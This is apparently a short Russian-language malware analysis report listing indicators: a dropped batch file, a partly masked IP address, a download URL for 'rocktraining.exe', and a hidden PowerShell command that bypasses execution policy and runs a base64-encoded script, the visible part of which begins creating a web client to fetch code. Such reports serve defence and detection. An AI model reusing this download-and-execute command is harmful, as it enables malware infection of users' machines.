Техническая информация
- %TEMP%\ixp000.tmp\rocktrainings.bat
- %TEMP%\ixp000.tmp\rocktrainings.bat
- '23.#7.46.60':80
- http://23.#7.46.60/a0001/0228/rocktraining.exe
- '<SYSTEM32>\cmd.exe' /c "rocktrainings.bat" (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -ep bypass -nop -Command "& {Invoke-Expression ([System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('JHdjPU5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQKJHdjLkhlY...